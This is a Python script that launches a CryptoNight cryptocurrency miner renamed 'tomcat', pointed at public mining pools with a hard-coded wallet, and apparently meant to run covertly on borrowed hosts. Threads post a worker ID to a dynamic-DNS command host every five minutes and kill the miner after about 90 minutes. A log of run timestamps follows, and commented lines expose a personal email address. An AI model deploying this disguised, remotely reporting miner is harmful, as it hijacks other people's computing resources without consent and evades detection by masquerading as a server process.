import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:09:01.397116
#2018-02-17 15:55:05.849582
#2018-02-17 17:43:02.212062
#2018-02-17 19:29:07.248206
#2018-02-17 21:18:06.758763
#2018-02-17 23:02:05.292985
#2018-02-18 00:49:04.887821
#2018-02-18 02:36:05.266036
#2018-02-18 04:23:04.991300
#2018-02-18 06:14:05.162768
#2018-02-18 08:04:07.460953
#2018-02-18 09:52:06.738443
#2018-02-18 11:39:07.042732
#2018-02-18 13:24:05.784053
#2018-02-18 15:14:03.746665
#2018-02-18 17:03:05.475820
#2018-02-18 18:50:06.722035
#2018-02-18 20:37:06.075195
#2018-02-18 22:23:05.380224
#2018-02-19 00:12:03.634553
#2018-02-19 01:58:07.426349
#2018-02-19 03:45:07.470333
#2018-02-19 05:31:03.438517
#2018-02-19 07:18:07.824318
#2018-02-19 09:07:01.648590
#2018-02-19 10:57:06.185014
#2018-02-19 12:44:02.140425
#2018-02-19 14:32:05.598307
#2018-02-19 16:21:04.695975
#2018-02-19 18:08:05.495625
#2018-02-19 19:56:06.571100
#2018-02-19 21:43:04.216438
#2018-02-19 23:29:07.832562
#2018-02-20 01:14:06.100124
#2018-02-20 03:06:04.968522
#2018-02-20 04:53:03.455640
#2018-02-20 06:36:06.590758
#2018-02-20 08:21:05.812837
#2018-02-20 10:06:08.283838
#2018-02-20 11:51:06.734305
#2018-02-20 13:40:07.869117
#2018-02-20 15:24:08.949515
#2018-02-20 17:11:08.679931
#2018-02-20 19:02:02.052311
#2018-02-20 20:50:08.566623
#2018-02-20 22:36:04.579167
#2018-02-21 00:17:03.817497
#2018-02-21 02:05:05.734917
#2018-02-21 03:51:07.417233
#2018-02-21 05:37:06.998407
#2018-02-21 07:25:08.987911
#2018-02-21 09:10:08.370339
#2018-02-21 10:59:01.878020
#2018-02-21 12:46:04.666807
#2018-02-21 14:34:09.750809
#2018-02-21 16:21:06.199199
#2018-02-21 18:12:09.836907
#2018-02-21 19:57:09.018490
#2018-02-21 21:44:08.781558
#2018-02-21 23:33:04.134945
#2018-02-22 01:21:04.888882
#2018-02-22 03:10:07.194092
#2018-02-22 04:56:05.095018
#2018-02-22 06:42:01.472420
#2018-02-22 08:31:04.069557
#2018-02-22 10:19:05.278921
#2018-02-22 12:06:07.421681
#2018-02-22 13:52:01.466103
#2018-02-22 15:41:08.891858
#2018-02-22 17:28:03.743577
#2018-02-22 19:15:12.190923
#2018-02-22 21:08:05.181264
#2018-02-22 22:53:02.231884
#2018-02-23 00:40:10.940924
#2018-02-23 02:26:03.731192
#2018-02-23 04:14:07.801058
#2018-02-23 06:01:03.755571
#2018-02-23 07:32:03.700707
#2018-02-23 09:35:06.116004
#2018-02-23 11:18:07.554818
#2018-02-23 12:38:08.729973
#2018-02-23 14:02:01.624973
#2018-02-23 15:40:06.913372
#2018-02-23 17:10:04.898604
#2018-02-23 18:34:06.943354
#2018-02-23 20:16:01.252863
#2018-02-23 21:48:01.420561
#2018-02-23 23:26:04.190835
#2018-02-24 00:57:07.740091
#2018-02-24 02:44:05.625127
#2018-02-24 04:19:06.864680
#2018-02-24 06:06:06.320269
#2018-02-24 07:54:01.636591
#2018-02-24 09:38:01.891131
#2018-02-24 11:33:07.388507
#2018-02-24 13:23:05.573622
#2018-02-24 15:12:06.636282
#2018-02-24 17:01:01.687043
#2018-02-24 18:48:07.624906
#2018-02-24 20:39:06.514002
#2018-02-25 01:11:05.198495
#2018-02-25 04:55:01.733036
#2018-02-25 09:18:01.717028